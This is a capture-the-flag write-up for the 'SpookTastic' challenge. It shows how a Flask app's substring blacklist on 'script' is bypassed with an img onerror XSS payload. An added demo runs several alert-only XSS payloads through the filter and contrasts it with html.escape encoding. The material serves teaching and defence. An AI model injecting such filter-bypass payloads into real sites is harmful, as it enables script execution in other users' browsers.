SpookTastic
SOLUTION
By analyzing the source code, we can see the blacklist that the email input has to pass, and the function that later hands out the flag:
    # Excerpt from the challenge server (Flask + Flask-SocketIO). socket_clients maps a
    # socket session id to the client's IP and socketio is the SocketIO instance.
    def blacklist_pass(email):
        # Only the literal substring "script" is rejected, after lowercasing, so case
        # variations such as <ScRiPt> are caught but any other tag passes untouched.
        email = email.lower()
        if "script" in email:
            return False
        return True

    def send_flag(user_ip):
        # Push the flag over the websocket to every client connected from user_ip.
        for id, ip in socket_clients.items():
            if ip == user_ip:
                socketio.emit("flag", {"flag": open("flag.txt").read()}, room=id)
Because the substring "script" is rejected regardless of case, a <script> tag cannot be used for the XSS payload. The filter says nothing about other tags, so an <img> tag with an onerror event handler passes the check and still executes JavaScript in the victim's browser:

    <img src=x onerror=alert(2)>
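The following is an added example, not part of the original writeup or the challenge code. It reimplements the challenge's blacklist, runs a set of constructed payloads through it to show exactly which ones it lets through and which it stops, and contrasts the blacklist with output encoding (html.escape), which is the fix a blacklist cannot replace. The payload list, the render_unsafe/render_safe helpers and the bypasses function are all assumptions made for illustration.

```python
import html

def blacklist_pass(email: str) -> bool:
    """Same logic as the challenge filter: reject input containing 'script' (any case)."""
    return "script" not in email.lower()

# Constructed payloads (assumption: each one executes JavaScript if reflected raw into HTML).
# The value records whether the blacklist is expected to let it through.
PAYLOADS = {
    "<script>alert(1)</script>": False,          # the obvious one, blocked
    "<ScRiPt>alert(1)</ScRiPt>": False,          # lower() defeats case games
    "<a href=\"javascript:alert(4)\">x</a>": False,  # 'javascript' contains 'script'
    "<img src=x onerror=alert(2)>": True,        # the writeup's payload, passes
    "<svg onload=alert(3)>": True,               # any other event handler also passes
}

def bypasses(filter_fn, payloads):
    """Return the payloads that the given filter accepts (i.e. the bypasses)."""
    return [p for p in payloads if filter_fn(p)]

def render_unsafe(email: str) -> str:
    """How the vulnerable page behaves: the value is reflected into HTML as-is."""
    return f"<p>Welcome, {email}</p>"

def render_safe(email: str) -> str:
    """The hardened form: encode for the HTML context instead of blacklisting words."""
    return f"<p>Welcome, {html.escape(email, quote=True)}</p>"

def check_expectations():
    """Confirm the blacklist behaves as recorded in PAYLOADS; returns True if all match."""
    return all(blacklist_pass(p) == expected for p, expected in PAYLOADS.items())

if __name__ == "__main__":
    for p in bypasses(blacklist_pass, PAYLOADS):
        print("passes blacklist:", p)
        print("  unsafe render:", render_unsafe(p))
        print("  safe render:  ", render_safe(p))
```

Running the block shows that both event-handler payloads survive the blacklist and land in the page as live markup in render_unsafe, while render_safe turns the same input into inert text (`&lt;img src=x onerror=alert(2)&gt;`). The takeaway is the general one: a substring blacklist only stops the strings its author thought of, whereas context-correct output encoding stops the whole class.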